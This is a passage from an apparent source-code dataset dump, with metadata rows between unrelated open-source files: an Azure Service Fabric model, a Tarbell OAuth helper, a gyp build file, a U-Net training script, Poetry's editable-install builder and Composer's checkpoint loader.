    All required parameters must be populated in order to send to Azure.

    :param id: The identity of the service. This ID is an encoded
     representation of the service name, used in the REST APIs to identify
     the service resource. Starting in version 6.0, hierarchical names are
     delimited with the "\\~" character: for service name
     "fabric:/myapp/app1/svc1" the identity is "myapp~app1\\~svc1" in 6.0+
     and "myapp/app1/svc1" in previous versions.
    :type id: str
    :param name: The full name of the service with 'fabric:' URI scheme.
    :type name: str
    :param type_name: Name of the service type as specified in the service
     manifest.
    :type type_name: str
    :param manifest_version: The version of the service manifest.
    :type manifest_version: str
    :param health_state: The health state of a Service Fabric entity such as
     Cluster, Node, Application, Service, Partition, Replica etc. Possible
     values include: 'Invalid', 'Ok', 'Warning', 'Error', 'Unknown'
    :type health_state: str or ~azure.servicefabric.models.HealthState
    :param service_status: The status of the application. Possible values
     include: 'Unknown', 'Active', 'Upgrading', 'Deleting', 'Creating',
     'Failed'
    :type service_status: str or ~azure.servicefabric.models.ServiceStatus
    :param is_service_group: Whether the service is in a service group.
    :type is_service_group: bool
    :param service_kind: Required. Constant filled by server.
    :type service_kind: str
    :param has_persisted_state: Whether the service has persisted state.
    :type has_persisted_state: bool
    """

    # Fields the serializer requires before a request can be sent.
    _validation = {
        'service_kind': {'required': True},
    }

    # Mapping from Python attribute names to wire (REST payload) keys.
    _attribute_map = {
        'id': {'key': 'Id', 'type': 'str'},
        'name': {'key': 'Name', 'type': 'str'},
        'type_name': {'key': 'TypeName', 'type': 'str'},
        'manifest_version': {'key': 'ManifestVersion', 'type': 'str'},
        'health_state': {'key': 'HealthState', 'type': 'str'},
        'service_status': {'key': 'ServiceStatus', 'type': 'str'},
        'is_service_group': {'key': 'IsServiceGroup', 'type': 'bool'},
        'service_kind': {'key': 'ServiceKind', 'type': 'str'},
        'has_persisted_state': {'key': 'HasPersistedState', 'type': 'bool'},
    }

    def __init__(self, *, id: str=None, name: str=None, type_name: str=None, manifest_version: str=None, health_state=None, service_status=None, is_service_group: bool=None, has_persisted_state: bool=None, **kwargs) -> None:
        # All fields shared with stateless services live on the base class.
        super(StatefulServiceInfo, self).__init__(
            id=id,
            name=name,
            type_name=type_name,
            manifest_version=manifest_version,
            health_state=health_state,
            service_status=service_status,
            is_service_group=is_service_group,
            **kwargs)
        # Polymorphic discriminator: constant for this subtype.
        self.service_kind = 'Stateful'
        self.has_persisted_state = has_persisted_state
| 49.422535
| 226
| 0.665147
|
4a0f317bc830ca25461e2b8b5a07535336a3a9f7
| 1,645
|
py
|
Python
|
tarbell/oauth.py
|
write-this-way/flask-tarbell
|
0e23e8d90ba66fde1a961ea530c99d94357ff664
|
[
"BSD-3-Clause"
] | 1
|
2016-03-12T21:16:46.000Z
|
2016-03-12T21:16:46.000Z
|
tarbell/oauth.py
|
write-this-way/flask-tarbell
|
0e23e8d90ba66fde1a961ea530c99d94357ff664
|
[
"BSD-3-Clause"
] | null | null | null |
tarbell/oauth.py
|
write-this-way/flask-tarbell
|
0e23e8d90ba66fde1a961ea530c99d94357ff664
|
[
"BSD-3-Clause"
] | null | null | null |
from argparse import ArgumentParser, RawDescriptionHelpFormatter
from oauth2client import client
from oauth2client import keyring_storage
from oauth2client import tools
from apiclient import discovery
import getpass
import httplib2
import os
# OAuth 2.0 scope granting full access to the user's Google Drive.
OAUTH_SCOPE = 'https://www.googleapis.com/auth/drive'
# Force the noauth_local_webserver flag to cover remote operation (e.g.
# using these commands on a server or in a virtual machine.)
parser = ArgumentParser(description=__doc__,
                        formatter_class=RawDescriptionHelpFormatter,
                        parents=[tools.argparser])
# Parsed flags are passed to tools.run_flow() in get_drive_api() below.
flags = parser.parse_args(['--noauth_local_webserver'])
def get_drive_api(path, reset_creds=False):
    """
    Return an authorized Google Drive v2 API service object.

    Credentials are read from the system keyring when available; otherwise
    the OAuth 2.0 browser flow is run (using ``client_secrets.json`` found
    under ``path``) and the resulting credentials are stored for future use.
    Pass ``reset_creds=True`` to force a fresh authorization.
    """
    storage = keyring_storage.Storage('tarbell', getpass.getuser())
    # Skip the cache entirely when the caller asked for fresh credentials.
    credentials = storage.get() if not reset_creds else None
    if not credentials:
        # No usable cached credentials: walk through the OAuth 2.0 flow.
        secrets_file = os.path.join(path, 'client_secrets.json')
        flow = client.flow_from_clientsecrets(secrets_file, scope=OAUTH_SCOPE)
        credentials = tools.run_flow(flow, storage, flags)
        storage.put(credentials)
    authorized_http = credentials.authorize(httplib2.Http())
    return discovery.build('drive', 'v2', http=authorized_http)
| 39.166667
| 76
| 0.691793
|
4a0f334b1f7a14f89c533516cdd5bb36c97ed430
| 818
|
gyp
|
Python
|
binding.gyp
|
jkozera/zest-travis-testing
|
9dd106d53ae1e720e4a75eb2ceaaf77ed0d989b1
|
[
"MIT"
] | 268
|
2016-01-13T00:44:54.000Z
|
2022-03-20T12:09:15.000Z
|
binding.gyp
|
jkozera/zest-travis-testing
|
9dd106d53ae1e720e4a75eb2ceaaf77ed0d989b1
|
[
"MIT"
] | 12
|
2016-02-06T11:15:17.000Z
|
2016-04-28T14:33:37.000Z
|
binding.gyp
|
jkozera/zest-travis-testing
|
9dd106d53ae1e720e4a75eb2ceaaf77ed0d989b1
|
[
"MIT"
] | 27
|
2016-02-08T17:43:45.000Z
|
2022-02-22T17:43:50.000Z
|
# GYP build definition for the "nodelucene" native Node.js addon, which links
# against the Lucene++ search library.
{
  "targets": [
    {
      "target_name": "nodelucene",
      "sources": [ "nodelucene/LuceneIndex.cc" ],
      "libraries": [
        "-llucene++",
        "-llucene++-contrib",
        "-L/usr/local/lib",
        # for Circle CI:
        "-L/home/ubuntu/installprefix/lib/x86_64-linux-gnu",
        # Embed a relative rpath so bundled libraries in ./resources next to
        # the binary are found at load time ($$ escapes '$' for gyp/make).
        "-Wl,-rpath,\\$$ORIGIN/resources"
      ],
      "xcode_settings": {
        "OTHER_CFLAGS": [
          "-std=c++11", "-stdlib=libc++", "-mmacosx-version-min=10.7", "-fexceptions"
        ],
      },
      # The '!' suffix excludes these default node-gyp flags, keeping C++
      # exceptions and RTTI enabled (Lucene++ needs both).
      "cflags!": [ "-fno-exceptions", "-fno-rtti" ],
      "cflags_cc!": [ "-fno-exceptions", "-fno-rtti" ],
      "include_dirs": [
        "/usr/local/include/lucene++",
        "/usr/local/include",
        # for Circle CI:
        "/home/ubuntu/installprefix/include/lucene++"
      ],
    }
  ]
}
| 27.266667
| 85
| 0.48533
|
4a0f33b3a790da4f74a87c6d9d052cd65eca411b
| 3,049
|
py
|
Python
|
5-Image_Segmentation/Unet/train.py
|
haigh1510/TensorFlow2.0-Examples
|
f99fcef22caa2758b5eefce10ee789384345506d
|
[
"MIT"
] | 1,775
|
2019-03-10T02:47:42.000Z
|
2022-03-30T07:22:08.000Z
|
5-Image_Segmentation/Unet/train.py
|
haigh1510/TensorFlow2.0-Examples
|
f99fcef22caa2758b5eefce10ee789384345506d
|
[
"MIT"
] | 128
|
2019-05-07T05:44:10.000Z
|
2022-03-22T11:07:30.000Z
|
5-Image_Segmentation/Unet/train.py
|
haigh1510/TensorFlow2.0-Examples
|
f99fcef22caa2758b5eefce10ee789384345506d
|
[
"MIT"
] | 752
|
2019-03-20T14:14:46.000Z
|
2022-03-22T08:38:36.000Z
|
#! /usr/bin/env python
# coding=utf-8
#================================================================
# Copyright (C) 2019 * Ltd. All rights reserved.
#
# Editor : VIM
# File name : train.py
# Author : YunYang1994
# Created date: 2019-09-19 15:25:10
# Description :
#
#================================================================
import os
import cv2
import numpy as np
from Unet import Unet
from tensorflow.keras.preprocessing.image import ImageDataGenerator
def DataGenerator(file_path, batch_size):
    """
    Yield (image, mask) batches for training/testing.

    Two ``ImageDataGenerator`` instances are driven by the same augmentation
    configuration and the same random ``seed`` so that every geometric
    transformation applied to an image is applied identically to its mask.

    Images and masks are read as grayscale from ``file_path/images`` and
    ``file_path/labels``, resized to 256x256, scaled to [0, 1], and the mask
    is binarized at 0.5.
    """
    # NOTE: the original code built a richer augmentation dict (rotation,
    # shifts, shear, zoom) and immediately overwrote it with the one below;
    # the dead literal has been removed. Restore the extra parameters here if
    # stronger augmentation is desired.
    aug_dict = dict(horizontal_flip=True,
                    fill_mode='nearest')
    image_datagen = ImageDataGenerator(**aug_dict)
    mask_datagen = ImageDataGenerator(**aug_dict)
    # Identical seeds keep the image and mask streams in lockstep.
    image_generator = image_datagen.flow_from_directory(
        file_path,
        classes=["images"],
        color_mode="grayscale",
        target_size=(256, 256),
        class_mode=None,
        batch_size=batch_size, seed=1)
    mask_generator = mask_datagen.flow_from_directory(
        file_path,
        classes=["labels"],
        color_mode="grayscale",
        target_size=(256, 256),
        class_mode=None,
        batch_size=batch_size, seed=1)
    train_generator = zip(image_generator, mask_generator)
    for img, mask in train_generator:
        img = img / 255.
        mask = mask / 255.
        # Binarize the mask: membrane vs. background.
        mask[mask > 0.5] = 1
        mask[mask <= 0.5] = 0
        yield (img, mask)
# ---------------------------------------------------------------------------
# Training: fit the U-Net on the membrane dataset and save the weights.
# ---------------------------------------------------------------------------
model = Unet(1, image_size=256)
trainset = DataGenerator("membrane/train", batch_size=2)
model.fit_generator(trainset, steps_per_epoch=5000, epochs=5)
model.save_weights("model.h5")

# ---------------------------------------------------------------------------
# Testing: predict masks and write blended visualizations to ./results.
# ---------------------------------------------------------------------------
testSet = DataGenerator("membrane/test", batch_size=1)
alpha = 0.3  # opacity of the red tint drawn over predicted background pixels
model.load_weights("model.h5")
if not os.path.exists("./results"): os.mkdir("./results")
for idx, (img, mask) in enumerate(testSet):
    oring_img = img[0]
    pred_mask = model.predict(img)[0]
    # Binarize the network output at 0.5.
    pred_mask[pred_mask > 0.5] = 1
    pred_mask[pred_mask <= 0.5] = 0
    img = cv2.cvtColor(img[0], cv2.COLOR_GRAY2RGB)
    # Vectorized overlay: blend a red tint into pixels predicted as
    # background and scale membrane pixels to 0-255 unchanged. This replaces
    # the original per-pixel Python double loop (interpreter-bound O(H*W))
    # with a single NumPy expression computing identical values.
    background = pred_mask[:, :, 0] <= 0.5
    blended = (1 - alpha) * img * 255 + alpha * np.array([0, 0, 255])
    img = np.where(background[:, :, None], blended, img * 255)
    image_accuracy = np.mean(mask == pred_mask)
    image_path = "./results/pred_" + str(idx) + ".png"
    print("=> accuracy: %.4f, saving %s" % (image_accuracy, image_path))
    cv2.imwrite(image_path, img)
    cv2.imwrite("./results/origin_%d.png" % idx, oring_img*255)
    if idx == 29: break
| 32.784946
| 81
| 0.581174
|
4a0f33b608fd8e17b7dedef87faa3fe377ea72f5
| 9,122
|
py
|
Python
|
poetry/masonry/builders/editable.py
|
HarryPeach/poetry
|
70ac497a81f3ac59ee890c6a7bee0ffc3cae6c6e
|
[
"MIT"
] | null | null | null |
poetry/masonry/builders/editable.py
|
HarryPeach/poetry
|
70ac497a81f3ac59ee890c6a7bee0ffc3cae6c6e
|
[
"MIT"
] | null | null | null |
poetry/masonry/builders/editable.py
|
HarryPeach/poetry
|
70ac497a81f3ac59ee890c6a7bee0ffc3cae6c6e
|
[
"MIT"
] | null | null | null |
import hashlib
import os
import shutil
from base64 import urlsafe_b64encode
from pathlib import Path
from typing import TYPE_CHECKING
from typing import List
from poetry.core.masonry.builders.builder import Builder
from poetry.core.masonry.builders.sdist import SdistBuilder
from poetry.core.masonry.utils.package_include import PackageInclude
from poetry.core.semver.version import Version
from poetry.utils._compat import WINDOWS
from poetry.utils._compat import decode
from poetry.utils.helpers import is_dir_writable
from poetry.utils.pip import pip_editable_install
if TYPE_CHECKING:
from cleo.io.io import IO # noqa
from poetry.core.poetry import Poetry
from poetry.utils.env import Env
SCRIPT_TEMPLATE = """\
#!{python}
from {module} import {callable_holder}
if __name__ == '__main__':
{callable_}()
"""
WINDOWS_CMD_TEMPLATE = """\
@echo off\r\n"{python}" "%~dp0\\{script}" %*\r\n
"""
class EditableBuilder(Builder):
    """Installs a package into ``env`` in editable (development) mode.

    Instead of copying the package into site-packages, it writes a ``.pth``
    file pointing at the source tree, generates console-script launchers,
    and records a ``*.dist-info`` directory so the install is discoverable.
    """

    def __init__(self, poetry: "Poetry", env: "Env", io: "IO") -> None:
        super().__init__(poetry)
        self._env = env
        self._io = io

    def build(self) -> None:
        """Perform the editable install: pth file, scripts, dist-info.

        Falls back to a generated ``setup.py`` + pip when the package has a
        build script that requires it.
        """
        self._debug(
            " - Building package <c1>{}</c1> in <info>editable</info> mode".format(
                self._package.name
            )
        )
        if self._package.build_script:
            if self._package.build_should_generate_setup():
                # A setup.py-based build is required; delegate to pip.
                self._debug(
                    " - <warning>Falling back on using a <b>setup.py</b></warning>"
                )
                return self._setup_build()
            self._run_build_script(self._package.build_script)
        # Clear out any previous (editable or regular) install of this package.
        for removed in self._env.site_packages.remove_distribution_files(
            distribution_name=self._package.name
        ):
            self._debug(
                " - Removed <c2>{}</c2> directory from <b>{}</b>".format(
                    removed.name, removed.parent
                )
            )
        added_files = []
        added_files += self._add_pth()
        added_files += self._add_scripts()
        self._add_dist_info(added_files)

    def _run_build_script(self, build_script: Path) -> None:
        """Execute the package's custom build script inside the target env."""
        self._debug(f" - Executing build script: <b>{build_script}</b>")
        self._env.run("python", str(self._path.joinpath(build_script)), call=True)

    def _setup_build(self) -> None:
        """Editable-install via pip using a (possibly generated) setup.py.

        A generated setup.py is removed afterwards; pyproject.toml is moved
        aside during the pip call (pip >= 19 would otherwise prefer it).
        """
        builder = SdistBuilder(self._poetry)
        setup = self._path / "setup.py"
        has_setup = setup.exists()
        if has_setup:
            self._io.write_line(
                "<warning>A setup.py file already exists. Using it.</warning>"
            )
        else:
            with setup.open("w", encoding="utf-8") as f:
                f.write(decode(builder.build_setup()))
        try:
            if self._env.pip_version < Version.from_parts(19, 0):
                pip_editable_install(self._path, self._env)
            else:
                # Temporarily rename pyproject.toml
                shutil.move(
                    str(self._poetry.file), str(self._poetry.file.with_suffix(".tmp"))
                )
                try:
                    pip_editable_install(self._path, self._env)
                finally:
                    # Always restore pyproject.toml, even if pip failed.
                    shutil.move(
                        str(self._poetry.file.with_suffix(".tmp")),
                        str(self._poetry.file),
                    )
        finally:
            # Only delete setup.py if we generated it ourselves.
            if not has_setup:
                os.remove(str(setup))

    def _add_pth(self) -> List[Path]:
        """Write a ``.pth`` file adding the source tree to sys.path.

        Returns the list containing the written path, or an empty list when
        site-packages is not writable.
        """
        paths = set()
        for include in self._module.includes:
            if isinstance(include, PackageInclude) and (
                include.is_module() or include.is_package()
            ):
                paths.add(include.base.resolve().as_posix())
        content = ""
        for path in paths:
            content += decode(path + os.linesep)
        pth_file = Path(self._module.name).with_suffix(".pth")
        # remove any pre-existing pth files for this package
        for file in self._env.site_packages.find(path=pth_file, writable_only=True):
            self._debug(
                " - Removing existing <c2>{}</c2> from <b>{}</b> for {}".format(
                    file.name, file.parent, self._poetry.file.parent
                )
            )
            # We can't use unlink(missing_ok=True) because it's not always available
            if file.exists():
                file.unlink()
        try:
            pth_file = self._env.site_packages.write_text(
                pth_file, content, encoding="utf-8"
            )
            self._debug(
                " - Adding <c2>{}</c2> to <b>{}</b> for {}".format(
                    pth_file.name, pth_file.parent, self._poetry.file.parent
                )
            )
            return [pth_file]
        except OSError:
            # TODO: Replace with PermissionError
            self._io.write_error_line(
                " - Failed to create <c2>{}</c2> for {}".format(
                    pth_file.name, self._poetry.file.parent
                )
            )
            return []

    def _add_scripts(self) -> List[Path]:
        """Generate console-script launchers (plus .cmd wrappers on Windows).

        Returns the list of files written; empty if no writable scripts
        directory could be found.
        """
        added = []
        entry_points = self.convert_entry_points()
        # Pick the first writable scripts directory (creating it if needed).
        for scripts_path in self._env.script_dirs:
            if is_dir_writable(path=scripts_path, create=True):
                break
        else:
            self._io.write_error_line(
                " - Failed to find a suitable script installation directory for {}".format(
                    self._poetry.file.parent
                )
            )
            return []
        scripts = entry_points.get("console_scripts", [])
        for script in scripts:
            # Entry points look like "name = module:callable.attr".
            name, script = script.split(" = ")
            module, callable_ = script.split(":")
            callable_holder = callable_.split(".", 1)[0]
            script_file = scripts_path.joinpath(name)
            self._debug(
                " - Adding the <c2>{}</c2> script to <b>{}</b>".format(
                    name, scripts_path
                )
            )
            with script_file.open("w", encoding="utf-8") as f:
                f.write(
                    decode(
                        SCRIPT_TEMPLATE.format(
                            python=self._env.python,
                            module=module,
                            callable_holder=callable_holder,
                            callable_=callable_,
                        )
                    )
                )
            # Mark the launcher executable for all users.
            script_file.chmod(0o755)
            added.append(script_file)
            if WINDOWS:
                cmd_script = script_file.with_suffix(".cmd")
                cmd = WINDOWS_CMD_TEMPLATE.format(python=self._env.python, script=name)
                self._debug(
                    " - Adding the <c2>{}</c2> script wrapper to <b>{}</b>".format(
                        cmd_script.name, scripts_path
                    )
                )
                with cmd_script.open("w", encoding="utf-8") as f:
                    f.write(decode(cmd))
                added.append(cmd_script)
        return added

    def _add_dist_info(self, added_files: List[Path]) -> None:
        """Write the ``*.dist-info`` metadata directory (METADATA, INSTALLER,
        entry_points.txt, RECORD) for the editable install."""
        from poetry.core.masonry.builders.wheel import WheelBuilder
        # Copy so the RECORD additions below don't mutate the caller's list.
        added_files = added_files[:]
        builder = WheelBuilder(self._poetry)
        dist_info = self._env.site_packages.mkdir(Path(builder.dist_info))
        self._debug(
            " - Adding the <c2>{}</c2> directory to <b>{}</b>".format(
                dist_info.name, dist_info.parent
            )
        )
        with dist_info.joinpath("METADATA").open("w", encoding="utf-8") as f:
            builder._write_metadata_file(f)
        added_files.append(dist_info.joinpath("METADATA"))
        with dist_info.joinpath("INSTALLER").open("w", encoding="utf-8") as f:
            f.write("poetry")
        added_files.append(dist_info.joinpath("INSTALLER"))
        if self.convert_entry_points():
            with dist_info.joinpath("entry_points.txt").open(
                "w", encoding="utf-8"
            ) as f:
                builder._write_entry_points(f)
            added_files.append(dist_info.joinpath("entry_points.txt"))
        # RECORD lists every installed file with its hash and size.
        with dist_info.joinpath("RECORD").open("w", encoding="utf-8") as f:
            for path in added_files:
                hash = self._get_file_hash(path)
                size = path.stat().st_size
                f.write("{},sha256={},{}\n".format(str(path), hash, size))
            # RECORD itself is recorded with no hash or size
            f.write("{},,\n".format(dist_info.joinpath("RECORD")))

    def _get_file_hash(self, filepath: Path) -> str:
        """Return the RECORD-style sha256 of ``filepath``: urlsafe base64,
        padding stripped, reading the file in 8 KiB chunks."""
        hashsum = hashlib.sha256()
        with filepath.open("rb") as src:
            while True:
                buf = src.read(1024 * 8)
                if not buf:
                    break
                hashsum.update(buf)
            src.seek(0)
        return urlsafe_b64encode(hashsum.digest()).decode("ascii").rstrip("=")

    def _debug(self, msg: str) -> None:
        """Emit ``msg`` only when the IO is in debug verbosity."""
        if self._io.is_debug():
            self._io.write_line(msg)
| 33.536765
| 92
| 0.539465
|
4a0f3474c5c1d023581cf515d8ab5d1051e221f6
| 23,088
|
py
|
Python
|
composer/utils/checkpoint.py
|
growlix/composer
|
27418a3c65dca26d90ac09c6ae67cbd5d0202ccf
|
[
"Apache-2.0"
] | null | null | null |
composer/utils/checkpoint.py
|
growlix/composer
|
27418a3c65dca26d90ac09c6ae67cbd5d0202ccf
|
[
"Apache-2.0"
] | null | null | null |
composer/utils/checkpoint.py
|
growlix/composer
|
27418a3c65dca26d90ac09c6ae67cbd5d0202ccf
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2022 MosaicML Composer authors
# SPDX-License-Identifier: Apache-2.0
"""Utilities for working with training checkpoints."""
from __future__ import annotations
import contextlib
import fnmatch
import logging
import os
import pathlib
import shutil
import tarfile
import tempfile
import textwrap
import warnings
from typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, Tuple, Union
import torch
from composer.utils import dist, reproducibility
from composer.utils.file_helpers import (FORMAT_NAME_WITH_DIST_AND_TIME_TABLE, format_name_with_dist_and_time, get_file,
is_tar)
from composer.utils.object_store import ObjectStore
if TYPE_CHECKING:
from composer.core.state import State
from composer.loggers import LoggerDestination
# Module-level logger for checkpoint load/save progress messages.
log = logging.getLogger(__name__)
__all__ = ["load_checkpoint", "save_checkpoint"]
# Name of the serialized composer state file stored inside a checkpoint.
_COMPOSER_STATES_FILENAME = "composer_states.pt"
_DEEPSPEED_TAG = "deepspeed"  # always tag with the same, deterministic name. We'll rename the tarball to the appropriate name.
def _format_path_with_rank_zero(path: str) -> str:
"""Formats ``path`` with the rank zero values."""
return path.format(
rank=0,
local_rank=0,
node_rank=0,
)
def _format_path_with_current_rank(path: str) -> str:
    """Format ``path`` with the rank values of the calling process."""
    replacements = {
        "rank": dist.get_global_rank(),
        "local_rank": dist.get_local_rank(),
        "node_rank": dist.get_node_rank(),
    }
    return path.format(**replacements)
def _get_write_mode(name: str) -> str:
"""Get the write mode to use with :func:`tarfile.open`."""
if name.endswith('.tar'):
return 'w'
if name.endswith(".tar.gz") or name.endswith(".tgz"):
return "w:gz"
if name.endswith(".tar.bz2"):
return "w:bz2"
if name.endswith(".tar.lzma"):
return "w:xz"
raise ValueError(f"{name} does not end with a valid tarfile extension.")
def load_checkpoint(
    path: str,
    state: State,
    object_store: Optional[Union[ObjectStore, LoggerDestination]] = None,
    load_weights_only: bool = False,
    strict_model_weights: bool = False,
    progress_bar: bool = True,
    ignore_keys: Optional[Union[List[str], Callable[[Dict], None]]] = None,
):
    """Load a checkpoint from a local file, URI, or cloud object store into ``state``.

    Args:
        path (str): The path format string to an existing checkpoint file.
            It can be a path to a file on the local disk, a URL, or if ``object_store`` is set, the object name
            for a checkpoint in a cloud bucket.
            When using `Deepspeed ZeRO <https://www.deepspeed.ai/tutorials/zero/>`_, checkpoints are shareded by rank.
            Instead of hard-coding the rank in the ``path``, use the following format variables:

            +------------------------+-------------------------------------------------------+
            | Variable               | Description                                           |
            +========================+=======================================================+
            | ``{rank}``             | The global rank, as returned by                       |
            |                        | :func:`~.dist.get_global_rank`.                       |
            +------------------------+-------------------------------------------------------+
            | ``{local_rank}``       | The local rank of the process, as returned by         |
            |                        | :func:`~.dist.get_local_rank`.                        |
            +------------------------+-------------------------------------------------------+
            | ``{node_rank}``        | The node rank, as returned by                         |
            |                        | :func:`~.dist.get_node_rank`.                         |
            +------------------------+-------------------------------------------------------+

            For example, suppose that checkpoints are stored in the following structure:

            .. code-block::

                my_model/ep1-rank0.tar
                my_model/ep1-rank1.tar
                my_model/ep1-rank2.tar
                ...

            Then, ``path`` should be set to ``my_model/ep1-rank{rank}.tar``, and all ranks will load the
            correct state.
        state (State): The :class:`~composer.core.state.State` to load the checkpoint into.
        object_store (Union[ObjectStore, LoggerDestination], optional): If the ``path`` is in an object store
            (i.e. AWS S3 or Google Cloud Storage), an instance of
            :class:`~.ObjectStore` or :class:`~.LoggerDestination` which will be used
            to retreive the checkpoint. Otherwise, if the checkpoint is a local filepath, set to ``None``.
            (default: ``None``)
        load_weights_only (bool, optional): Whether or not to only restore the model weights from the checkpoint without
            restoring the associated state. (default: ``False``)
        strict_model_weights (bool, optional): Whether or not to force that the checkpointed weights must exactly
            match the model weights. (default: ``False``)
        progress_bar (bool, optional): Whether or not to show a progress bar when downloading checkpoints.
            Ignored if the checkpoint is a local file path. (default: ``True``)
        ignore_keys (List[str] | (Dict) -> None, optional): A list of paths for the ``state_dict`` of the checkpoint,
            which, when provided, will be ignored from the state_dict before a checkpoint is loaded. Each path is a list
            of strings specifying the keys to index into ``state_dict`` joined together with `/` as a seperator (as PyTorch
            uses `.` in parameter names). If a prefix is provided, all children are also ignored (see Example 2).
            See :mod:`composer.core.state` for the structure of state_dict.

            Example 1: ``ignore_keys = ["state/model/layer1.weights", "state/model/layer1.bias"]`` would ignore
            layer 1 weights and bias.

            Example 2: ``ignore_keys = ["state/model/*"]`` would ignore the entire model, which would have the same
            effect as the previous example if there was only 1 layer.

            Example 3: ``ignore_keys = ["state/model/layer*.weights"]`` would ignore all weights in the model.

            Example 4: ``ignore_keys = ["state/rank_zero_seed", "rng"]`` would reset all randomness when
            loading the checkpoint.

            If a callable, it should take one argument which is the state_dict. The callable is free to arbitrarily modify
            the state_dict before it is loaded.

            (default: ``None``)

    Returns:
        Optional[List[Dict[str, Any]]]: The RNG state dicts, indexed by global rank, if
            :attr:`load_weights_only` is not None. Otherwise, None.
    """
    # download the checkpoint to the node-local folder
    # Only local rank zero creates the tempdir; the other ranks learn its
    # location via _get_node_checkpoint_download_folder below.
    tempdir_ctx = tempfile.TemporaryDirectory() if dist.get_local_rank() == 0 else contextlib.nullcontext(None)
    with tempdir_ctx as tempdir:
        try:
            node_checkpoint_folder = _get_node_checkpoint_download_folder(tempdir)
            composer_states_filepath, extracted_checkpoint_folder, extracted_rank_n = _download_checkpoint(
                path=path,
                node_checkpoint_folder=node_checkpoint_folder,
                object_store=object_store,
                progress_bar=progress_bar,
            )
            rng_state_dicts = _restore_checkpoint(
                state,
                composer_states_filepath,
                extracted_rank_n,
                extracted_checkpoint_folder,
                load_weights_only=load_weights_only,
                strict_model_weights=strict_model_weights,
                ignore_keys=ignore_keys,
            )
        finally:
            # Wait for all ranks to finish restoring the checkpoint before releasing the tempdir, since tempdir can
            # be a shared resource between nodes.
            dist.barrier()
    log.info("%s loaded from %s", "Model weights" if load_weights_only else "Trainer checkpoint", path)
    return rng_state_dicts
def _get_node_checkpoint_download_folder(path: Optional[str]) -> str:
    """Broadcast ``path`` from the node's local rank zero to all local ranks."""
    # The global rank of this node's local-rank-zero process.
    local_rank_zero = dist.get_local_world_size() * dist.get_node_rank()
    gathered_paths = dist.all_gather_object(path)
    result = gathered_paths[local_rank_zero]
    assert result is not None, "local rank zero provides the path"
    return result
def _download_checkpoint(
    path: str,
    node_checkpoint_folder: str,
    object_store: Optional[Union[ObjectStore, LoggerDestination]],
    progress_bar: bool,
) -> Tuple[str, Optional[str], bool]:
    """Download the checkpoint stored at ``path``, potentially in ``object_store``, to ``node_checkpoint_folder``.

    Returns a tuple of (``composer_states_filepath``, ``extracted_checkpoint_folder``, ``extracted_rank_n``).

    * The ``composer_states_filepath``, is the path to the composer states, which can be passed into
      :meth:`torch.load`.
    * The ``extracted_checkpoint_folder`` is the path to the checkpoint folder, which can be passed into
      :meth:`deepspeed.DeepSpeedEngine.load_checkpoint`.
    * The ``extracted_rank_n`` is a boolean flag indicating whether a tarball was extracted on global
      rank greater than 0.
    """
    # Per-rank download targets inside the node-shared folder.
    rank_zero_checkpoint_filepath = os.path.join(node_checkpoint_folder, "rank0_checkpoint")
    rank_n_checkpoint_filepath = os.path.join(node_checkpoint_folder, f"rank{dist.get_global_rank()}_checkpoint")
    extracted_checkpoint_folder = None
    extracted_rank_n = False
    if is_tar(path):
        # Tarball checkpoints are unpacked; the composer states live inside.
        extracted_checkpoint_folder = os.path.join(node_checkpoint_folder, "checkpoint")
        composer_states_filepath = os.path.join(extracted_checkpoint_folder, _COMPOSER_STATES_FILENAME)
    else:
        # it's not an archive; it's just the composer state dict
        # and only rank zero has this file
        extracted_checkpoint_folder = None
        composer_states_filepath = rank_zero_checkpoint_filepath
    try:
        if dist.get_local_rank() == 0:
            # every NODE needs the GLOBAL rank zero checkpoint
            path = _format_path_with_rank_zero(path)
            get_file(destination=rank_zero_checkpoint_filepath,
                     path=path,
                     object_store=object_store,
                     progress_bar=progress_bar)
            if extracted_checkpoint_folder is not None:
                try:
                    # NOTE(review): members are extracted without path
                    # sanitization; checkpoints are presumed trusted input —
                    # confirm before accepting user-supplied archives.
                    with tarfile.open(rank_zero_checkpoint_filepath) as tarball:
                        tarball.extractall(extracted_checkpoint_folder)
                except FileNotFoundError:
                    # Not re-raising the file-not-found error as that is irrelevant;
                    # the underlying issue is that the checkpoint file does not exist on the disk
                    # or could not be downloaded
                    raise RuntimeError(f"Checkpoint {path} does not exist")
        if rank_zero_checkpoint_filepath != rank_n_checkpoint_filepath:
            # every RANK needs ITS OWN checkpoint.
            # But, the global rank zero is a special case -- these files are the same!
            assert dist.get_global_rank() != 0, "invariant violation"
            try:
                get_file(destination=rank_n_checkpoint_filepath,
                         path=_format_path_with_current_rank(path),
                         object_store=object_store,
                         progress_bar=progress_bar)
            except FileNotFoundError:
                # Allowing not-found errors to be ignored as sometimes there won't be rank-local checkpoints
                # (e.g. when not using deepspeed)
                pass
            if extracted_checkpoint_folder is not None:
                try:
                    # it's an archive and needs to be extracted
                    with tarfile.open(rank_n_checkpoint_filepath) as tarball:
                        tarball.extractall(extracted_checkpoint_folder)
                        extracted_rank_n = True
                except FileNotFoundError:
                    # this will happen most of the time (i.e. whenever deepspeed
                    # is not being used) so not logging anything
                    pass
    finally:
        # Wait for all checkpoints on the node to finish downloading
        # Putting the barrier in a finally so the rank will always block on the barrier,
        # even if it has an exception.
        # Any exception will be re-raised after the barrier passes. The launcher script
        # will detect the process crash and terminate the other ranks
        dist.barrier()
    return composer_states_filepath, extracted_checkpoint_folder, extracted_rank_n
def _flatten_keys(obj: Any, paths: List[str], existing_path: str):
"""Recursively flatten the keys of a dictionary or list into a set of paths."""
# Store path when we reach end, which is either non-Dict or empty Dict
if isinstance(obj, list) and len(obj) > 0:
for i, elm in enumerate(obj):
_flatten_keys(elm, paths, f"{existing_path}/{i}")
elif isinstance(obj, dict) and len(obj) > 0:
for k, v in obj.items():
_flatten_keys(v, paths, f"{existing_path}/{k}")
# Remove leading /
paths.append(existing_path.lstrip('/'))
def _remove_paths(obj: Union[list, Dict[str, Any]], exclude_paths: List[List[str]]):
# First determine the keys which will be recursed on and which will be removed entirely
# Group the `exclude_paths` by the key
keys_to_recurse = {}
keys_to_remove = []
for exclude_path_parts in exclude_paths:
key = exclude_path_parts[0]
if isinstance(obj, list):
key = int(key)
if len(exclude_path_parts) == 1:
keys_to_remove.append(key)
else:
if key not in keys_to_recurse:
keys_to_recurse[key] = []
keys_to_recurse[key].append(exclude_path_parts[1:])
# Recurse first, so in the case of a list, the indexing is consistent
for key, paths_to_recurse in keys_to_recurse.items():
